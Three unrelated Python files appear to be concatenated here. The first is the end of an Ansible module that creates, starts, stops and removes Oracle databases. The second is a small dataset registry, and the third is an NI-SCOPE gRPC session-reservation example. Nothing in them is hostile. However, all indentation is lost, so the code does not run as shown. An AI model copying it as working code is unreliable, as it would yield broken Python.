msg = ' Database %s already exists and is in the intended state' \
' - Archivelog: %s, Force Logging: %s, Flashback: %s' % (
db_name, archivelog, force_logging, flashback)
changed = False
module.exit_json(msg=msg, changed=changed)
def apply_restart_changes(module, oracle_home, db_name, db_unique_name, sid, instance_name, israc,
archcomp, change_restart_sql):
if stop_db(module, oracle_home, db_name, db_unique_name, sid):
if start_instance(module, oracle_home, db_name, db_unique_name, sid, 'mount', instance_name, israc):
time.sleep(10) # <- To allow the DB to register with the listener
cursor = getconn(module)
for sql in change_restart_sql:
execute_sql(module, cursor, sql)
if stop_db(module, oracle_home, db_name, db_unique_name, sid):
if start_db(module, oracle_home, db_name, db_unique_name, sid):
if newdb:
msg = 'Database %s successfully created (%s) ' % (db_name, archcomp)
if output == 'verbose':
msg += ' ,'.join(verboselist)
else:
msg = 'Database %s has been put in the intended state - (%s) ' % (db_name, archcomp)
if output == 'verbose':
msg += ' ,'.join(verboselist)
def apply_norestart_changes(module, change_db_sql):
cursor = getconn(module)
for sql in change_db_sql:
execute_sql(module, cursor, sql)
def stop_db(module, oracle_home, db_name, db_unique_name, sid):
if gimanaged:
if db_unique_name is not None:
db_name = db_unique_name
command = '%s/bin/srvctl stop database -d %s -o immediate' % (oracle_home, db_name)
(rc, stdout, stderr) = module.run_command(command)
if rc != 0:
msg = 'Error - STDOUT: %s, STDERR: %s, COMMAND: %s' % (stdout, stderr, command)
module.fail_json(msg=msg, changed=False)
else:
return True
else:
if sid is not None:
os.environ['ORACLE_SID'] = sid
else:
os.environ['ORACLE_SID'] = db_name
shutdown_sql = '''
connect / as sysdba
shutdown immediate;
exit
'''
sqlplus_bin = '%s/bin/sqlplus' % oracle_home
p = subprocess.Popen([sqlplus_bin, '/nolog'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate(shutdown_sql.encode('utf-8'))
rc = p.returncode
if rc != 0:
msg = 'Error - STDOUT: %s, STDERR: %s, COMMAND: %s' % (stdout, stderr, shutdown_sql)
module.fail_json(msg=msg, changed=False)
else:
return True
def start_db(module, oracle_home, db_name, db_unique_name, sid):
if gimanaged:
if db_unique_name is not None:
db_name = db_unique_name
command = '%s/bin/srvctl start database -d %s' % (oracle_home, db_name)
(rc, stdout, stderr) = module.run_command(command)
if rc != 0:
msg = 'Error - STDOUT: %s, STDERR: %s, COMMAND: %s' % (stdout, stderr, command)
module.fail_json(msg=msg, changed=False)
else:
return True
else:
if sid is not None:
os.environ['ORACLE_SID'] = sid
else:
os.environ['ORACLE_SID'] = db_name
startup_sql = '''
connect / as sysdba
startup;
exit
'''
sqlplus_bin = '%s/bin/sqlplus' % oracle_home
p = subprocess.Popen([sqlplus_bin, '/nolog'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate(startup_sql.encode('utf-8'))
rc = p.returncode
if rc != 0:
msg = 'Error - STDOUT: %s, STDERR: %s, COMMAND: %s' % (stdout, stderr, startup_sql)
module.fail_json(msg=msg, changed=False)
else:
return True
def start_instance(module, oracle_home, db_name, db_unique_name, sid, open_mode, instance_name, israc):
if gimanaged:
if db_unique_name is not None:
db_name = db_unique_name
if israc:
command = '%s/bin/srvctl start instance -d %s -i %s' % (oracle_home, db_name, instance_name)
else:
command = '%s/bin/srvctl start database -d %s ' % (oracle_home, db_name)
if open_mode is not None:
command += ' -o %s ' % open_mode
(rc, stdout, stderr) = module.run_command(command)
if rc != 0:
msg = 'Error - STDOUT: %s, STDERR: %s, COMMAND: %s' % (stdout, stderr, command)
module.fail_json(msg=msg, changed=False)
else:
return True
else:
if sid is not None:
os.environ['ORACLE_SID'] = sid
else:
os.environ['ORACLE_SID'] = db_name
startup_sql = '''
connect / as sysdba
startup mount;
exit
'''
sqlplus_bin = '%s/bin/sqlplus' % oracle_home
p = subprocess.Popen([sqlplus_bin, '/nolog'], stdin=subprocess.PIPE,
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
(stdout, stderr) = p.communicate(startup_sql.encode('utf-8'))
rc = p.returncode
if rc != 0:
msg = 'Error - STDOUT: %s, STDERR: %s, COMMAND: %s' % (stdout, stderr, startup_sql)
module.fail_json(msg=msg, changed=False)
else:
return True
def execute_sql_get(module, cursor, sql):
try:
cursor.execute(sql)
result = (cursor.fetchall())
except cx_Oracle.DatabaseError as exc:
error, = exc.args
msg = 'Something went wrong while executing sql_get - %s sql: %s' % (error.message, sql)
module.fail_json(msg=msg, changed=False)
return False
return result
def execute_sql(module, cursor, sql):
try:
cursor.execute(sql)
except cx_Oracle.DatabaseError as exc:
error, = exc.args
msg = 'Something went wrong while executing sql - %s sql: %s' % (error.message, sql)
module.fail_json(msg=msg, changed=False)
return False
return True
def getconn(module):
hostname = os.uname()[1]
wallet_connect = '/@%s' % service_name
try:
if not user and not password: # If neither user or password is supplied, the use of an oracle wallet is assumed
connect = wallet_connect
conn = cx_Oracle.connect(wallet_connect, mode=cx_Oracle.SYSDBA)
elif user and password:
dsn = cx_Oracle.makedsn(host=hostname, port=port, service_name=service_name, )
connect = dsn
conn = cx_Oracle.connect(user, password, dsn, mode=cx_Oracle.SYSDBA)
elif not user or not password:
module.fail_json(msg='Missing username or password for cx_Oracle')
except cx_Oracle.DatabaseError as exc:
error, = exc.args
msg = 'Could not connect to database - %s, connect descriptor: %s' % (error.message, connect)
module.fail_json(msg=msg, changed=False)
cursor = conn.cursor()
return cursor
def main():
msg = ['']
global gimanaged
global major_version
global user
global password
global service_name
global hostname
global port
global israc
global newdb
global output
global verbosemsg
global verboselist
verbosemsg = ''
verboselist = []
newdb = False
module = AnsibleModule(
argument_spec=dict(
oracle_home=dict(default=None, aliases=['oh']),
db_name=dict(required=True, aliases=['db', 'database_name', 'name']),
sid=dict(required=False),
db_unique_name=dict(required=False, aliases=['dbunqn', 'unique_name']),
sys_password=dict(required=False, no_log=True, aliases=['syspw', 'sysdbapassword', 'sysdbapw']),
system_password=dict(required=False, no_log=True, aliases=['systempw']),
dbsnmp_password=dict(required=False, no_log=True, aliases=['dbsnmppw']),
responsefile=dict(required=False),
template=dict(default='General_Purpose.dbc'),
cdb=dict(default=False, type='bool', aliases=['container']),
local_undo=dict(default=True, type='bool'),
datafile_dest=dict(required=False, aliases=['dfd']),
recoveryfile_dest=dict(required=False, aliases=['rfd']),
storage_type=dict(default='FS', aliases=['storage'], choices=['FS', 'ASM']),
dbconfig_type=dict(default='SI', choices=['SI', 'RAC', 'RACONENODE']),
db_type=dict(default='MULTIPURPOSE', choices=['MULTIPURPOSE', 'DATA_WAREHOUSING', 'OLTP']),
racone_service=dict(required=False, aliases=['ron_service']),
characterset=dict(default='AL32UTF8'),
memory_percentage=dict(required=False),
memory_totalmb=dict(default='1024'),
nodelist=dict(required=False, type='list'),
amm=dict(default=False, type='bool', aliases=['automatic_memory_management']),
initparams=dict(required=False, type='list'),
customscripts=dict(required=False, type='list'),
default_tablespace_type=dict(default='smallfile', choices=['smallfile', 'bigfile']),
default_tablespace=dict(required=False),
default_temp_tablespace=dict(required=False),
archivelog=dict(default=False, type='bool'),
force_logging=dict(default=False, type='bool'),
flashback=dict(default=False, type='bool'),
datapatch=dict(default=True, type='bool'),
output=dict(default="short", choices=["short", "verbose"]),
state=dict(default="present", choices=["present", "absent", "started"]),
hostname=dict(required=False, default='localhost', aliases=['host']),
port=dict(required=False, default=1521),
),
mutually_exclusive=[['memory_percentage', 'memory_totalmb']]
)
oracle_home = module.params["oracle_home"]
db_name = module.params["db_name"]
sid = module.params["sid"]
db_unique_name = module.params["db_unique_name"]
sys_password = module.params["sys_password"]
system_password = module.params["system_password"]
dbsnmp_password = module.params["dbsnmp_password"]
responsefile = module.params["responsefile"]
template = module.params["template"]
cdb = module.params["cdb"]
local_undo = module.params["local_undo"]
datafile_dest = module.params["datafile_dest"]
recoveryfile_dest = module.params["recoveryfile_dest"]
storage_type = module.params["storage_type"]
dbconfig_type = module.params["dbconfig_type"]
racone_service = module.params["racone_service"]
characterset = module.params["characterset"]
memory_percentage = module.params["memory_percentage"]
memory_totalmb = module.params["memory_totalmb"]
nodelist = module.params["nodelist"]
db_type = module.params["db_type"]
amm = module.params["amm"]
initparams = module.params["initparams"]
customscripts = module.params["customscripts"]
default_tablespace_type = module.params["default_tablespace_type"]
default_tablespace = module.params["default_tablespace"]
default_temp_tablespace = module.params["default_temp_tablespace"]
archivelog = module.params["archivelog"]
force_logging = module.params["force_logging"]
flashback = module.params["flashback"]
output = module.params["output"]
state = module.params["state"]
hostname = module.params["hostname"]
port = module.params["port"]
# ld_library_path = '%s/lib' % (oracle_home)
if oracle_home is not None:
os.environ['ORACLE_HOME'] = oracle_home.rstrip('/')
# os.environ['LD_LIBRARY_PATH'] = ld_library_path
elif 'ORACLE_HOME' in os.environ:
oracle_home = os.environ['ORACLE_HOME']
# ld_library_path = os.environ['LD_LIBRARY_PATH']
else:
msg = 'ORACLE_HOME variable not set. Please set it and re-run the command'
module.fail_json(msg=msg, changed=False)
# Decide whether to use srvctl or sqlplus
if os.path.exists('/etc/oracle/olr.loc'):
gimanaged = True
else:
gimanaged = False
if not cx_oracle_exists:
msg = "The cx_Oracle module is required. 'pip install cx_Oracle' should do the trick." \
" If cx_Oracle is installed, make sure ORACLE_HOME & LD_LIBRARY_PATH is set"
module.fail_json(msg=msg)
# Connection details for database
user = 'sys'
password = sys_password
if db_unique_name is not None:
service_name = db_unique_name
else:
service_name = db_name
# Get the Oracle version
major_version = get_version(module, oracle_home)
if state == 'started':
msg = "oracle_home: %s db_name: %s sid: %s db_unique_name: %s" % (oracle_home, db_name, sid, db_unique_name)
if not check_db_exists(module, oracle_home, db_name, sid, db_unique_name):
msg = "Database not found. %s" % msg
module.fail_json(msg=msg, changed=False)
else:
if start_db(module, oracle_home, db_name, db_unique_name, sid):
msg = "Database started."
module.exit_json(msg=msg, changed=True)
else:
msg = "Startup failed. %s" % msg
module.fail_json(msg=msg, changed=False)
elif state == 'present':
if not check_db_exists(module, oracle_home, db_name, sid, db_unique_name):
if create_db(module, oracle_home, sys_password, system_password, dbsnmp_password, db_name, sid,
db_unique_name, responsefile, template, cdb, local_undo, datafile_dest, recoveryfile_dest,
storage_type, dbconfig_type, racone_service, characterset, memory_percentage, memory_totalmb,
nodelist, db_type, amm, initparams, customscripts):
newdb = True
ensure_db_state(module, oracle_home, db_name, db_unique_name, sid, archivelog, force_logging,
flashback, default_tablespace_type, default_tablespace, default_temp_tablespace)
else:
module.fail_json(msg=msg, changed=False)
else:
ensure_db_state(module, oracle_home, db_name, db_unique_name, sid, archivelog, force_logging,
flashback, default_tablespace_type, default_tablespace, default_temp_tablespace)
elif state == 'absent':
if check_db_exists(module, oracle_home, db_name, sid, db_unique_name):
if remove_db(module, msg, oracle_home, db_name, sid, db_unique_name, sys_password):
msg = 'Successfully removed database %s' % db_name
module.exit_json(msg=msg, changed=True)
else:
module.fail_json(msg=msg, changed=False)
else:
msg = 'Database %s doesn\'t exist' % db_name
module.exit_json(msg=msg, changed=False)
module.exit_json(msg="Unhandled exit", changed=False)
if __name__ == '__main__':
main()
|
from pathlib import Path
from .dataset import Dataset
from .. import data
logic_gate_and = Dataset('logic_gate_and', Path(data.__file__).parent.resolve() / 'logic_gate_and', bias = -1)
logic_gate_or = Dataset('logic_gate_or', Path(data.__file__).parent.resolve() / 'logic_gate_or', bias = -1)
logic_gate_xor = Dataset('logic_gate_xor', Path(data.__file__).parent.resolve() / 'logic_gate_xor', bias = -1)
blood_transfusion = Dataset('blood_transfusion', Path(data.__file__).parent.resolve() / 'blood_transfusion', bias = -1)
cryotherapy = Dataset('cryotherapy', Path(data.__file__).parent.resolve() / 'cryotherapy', bias = -1)
diabetes = Dataset('diabetes', Path(data.__file__).parent.resolve() / 'diabetes', bias = -1)
tic_tac_toe_endgame = Dataset('tic_tac_toe_endgame', Path(data.__file__).parent.resolve() / 'tic_tac_toe_endgame', bias = -1)
tsne_2d = Dataset('tsne_2d', Path(data.__file__).parent.resolve() / 'tsne_2d', output_type = int)
|
#
# This example initiates a session and uses the session API to exercise some common reservation operations on the session.
# This particular example is using NI-SCOPE but the session reservation API should work for any driver session.
#
# The gRPC API is built from the C API. NI-SCOPE documentation is installed with the driver at:
# C:\Program Files (x86)\IVI Foundation\IVI\Drivers\niScope\Documentation\English\Digitizers.chm
#
# A version of this .chm is available online at:
# Link: https://zone.ni.com/reference/en-XX/help/370592AB-01/
#
# Getting Started:
#
# To run this example, install "NI-SCOPE Driver" on the server machine.
# Link : https://www.ni.com/en-us/support/downloads/drivers/download.ni-scope.html
#
# For instructions on how to use protoc to generate gRPC client interfaces, see our "Creating a gRPC Client" wiki page.
# Link: https://github.com/ni/grpc-device/wiki/Creating-a-gRPC-Client
#
# Refer to the NI-SCOPE gRPC Wiki to determine the valid channel and resource names for your NI-SCOPE module.
# Link : https://github.com/ni/grpc-device/wiki/NI-SCOPE-C-Function-Reference
#
#
# Running from command line:
#
# Server machine's IP address, port number, and resource name can be passed as separate command line arguments.
# > python session-reservation.py <server_address> <port_number> <resource_name>
# If they are not passed in as command line arguments, then by default the server address will be "localhost:31763", with "SimulatedScope" as the resource name
import grpc
import sys
import time
import niscope_pb2 as niscope_types
import niscope_pb2_grpc as grpc_niscope
import session_pb2 as session_types
import session_pb2_grpc as grpc_session
server_address = "localhost"
server_port = "31763"
# Resource name and options for a simulated 5164 client. Change them according to the NI-SCOPE model.
resource = "SimulatedScope"
options = "Simulate=1, DriverSetup=Model:5164; BoardType:PXIe"
client_1_id = "Client1"
client_2_id = "Client2"
any_error = False
# Checks for errors. If any, throws an exception to stop the execution.
def CheckForError (vi, status) :
global any_error
if(status != 0 and not any_error):
any_error = True
ThrowOnError (vi, status)
# Converts an error code returned by NI-SCOPE into a user-readable string.
def ThrowOnError (vi, error_code):
error_message_request = niscope_types.GetErrorMessageRequest(
vi = vi,
error_code = error_code
)
error_message_response = niscope_client.GetErrorMessage(error_message_request)
raise Exception (error_message_response.error_message)
# Read in cmd args
if len(sys.argv) >= 2:
server_address = sys.argv[1]
if len(sys.argv) >= 3:
server_port = sys.argv[2]
if len(sys.argv) >= 4:
resource = sys.argv[3]
options = ""
# Create the communication channel for the remote host and create connections to the NI-SCOPE and session services.
channel = grpc.insecure_channel(f"{server_address}:{server_port}")
niscope_client = grpc_niscope.NiScopeStub(channel)
session_client = grpc_session.SessionUtilitiesStub(channel)
try :
# Reset server to start in a fresh state.
reset_server_response = session_client.ResetServer(session_types.ResetServerRequest())
assert(reset_server_response.is_server_reset)
# Open session to NI-SCOPE module with options.
session_name = "NI-Scope-Session-1"
print('\nInitializing session...')
init_with_options_response = niscope_client.InitWithOptions(niscope_types.InitWithOptionsRequest(
session_name = session_name,
resource_name = resource,
id_query = False,
option_string = options
))
vi = init_with_options_response.vi
CheckForError(vi, init_with_options_response.status)
print(f'Session initialized with name {session_name} and id {vi.id}.\n')
# Check if session is reserved by client 1.
# Note: The reservation_id is defined by and has meaning only for the client + Session Reservation API.
print(f'Checking if {session_name} is reserved by {client_1_id}...')
is_reserved_response = session_client.IsReservedByClient(session_types.IsReservedByClientRequest(
reservation_id = session_name,
client_id = client_1_id
))
assert(not is_reserved_response.is_reserved)
print(f'{session_name} is not reserved by {client_1_id}.\n')
# Reserve session for client 1.
print(f'Reserving {session_name} for {client_1_id}...')
reserve_response = session_client.Reserve(session_types.ReserveRequest(
reservation_id = session_name,
client_id = client_1_id
))
is_reserved = reserve_response.is_reserved
assert(is_reserved)
is_reserved_by_client1_response = session_client.IsReservedByClient(session_types.IsReservedByClientRequest(
reservation_id = session_name,
client_id = client_1_id
))
assert(is_reserved_by_client1_response.is_reserved)
print(f'{session_name} is reserved by {client_1_id}.\n')
# Check reservation on client 2.
print(f'Checking if {session_name} is reserved by {client_2_id}...')
is_reserved_by_client2_response = session_client.IsReservedByClient(session_types.IsReservedByClientRequest(
reservation_id = session_name,
client_id = client_2_id
))
assert(not is_reserved_by_client2_response.is_reserved)
print(f'{session_name} is not reserved by {client_2_id}.\n')
# Unreserve on client 1.
print(f'Unreserving {session_name} reserved by {client_1_id}...')
is_unreserved_response = session_client.Unreserve(session_types.UnreserveRequest(
reservation_id = session_name,
client_id = client_1_id
))
assert(is_unreserved_response.is_unreserved)
is_reserved_by_client1_response = session_client.IsReservedByClient(session_types.IsReservedByClientRequest(
reservation_id = session_name,
client_id = client_1_id
))
assert(not is_reserved_by_client1_response.is_reserved)
print(f'{session_name} is no longer reserved by {client_1_id}.\n')
print(f'Reserving {session_name} for {client_2_id}...')
reserve_response = session_client.Reserve(session_types.ReserveRequest(
reservation_id = session_name,
client_id = client_2_id
))
is_reserved = reserve_response.is_reserved
assert(is_reserved)
is_reserved_by_client2_response = session_client.IsReservedByClient(session_types.IsReservedByClientRequest(
reservation_id = session_name,
client_id = client_2_id
))
assert(is_reserved_by_client2_response.is_reserved)
print(f'{session_name} is reserved by {client_2_id}.\n')
# Reset server.
print(f'Resetting the server...')
reset_server_response = session_client.ResetServer(session_types.ResetServerRequest())
assert(reset_server_response.is_server_reset)
is_reserved_by_client2_response = session_client.IsReservedByClient(session_types.IsReservedByClientRequest(
reservation_id = session_name,
client_id = client_2_id
))
assert(not is_reserved_by_client2_response.is_reserved)
print(f'All sessions have been closed and reservations have been cleared.\n')
# If NI-SCOPE API or Session API throws an exception, print the error message.
except grpc.RpcError as rpc_error:
error_message = rpc_error.details()
if rpc_error.code() == grpc.StatusCode.UNAVAILABLE:
error_message = f"Failed to connect to server on {server_address}:{server_port}"
elif rpc_error.code() == grpc.StatusCode.UNIMPLEMENTED:
error_message = "The operation is not implemented or is not supported/enabled in this service"
print(f"{error_message}") |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.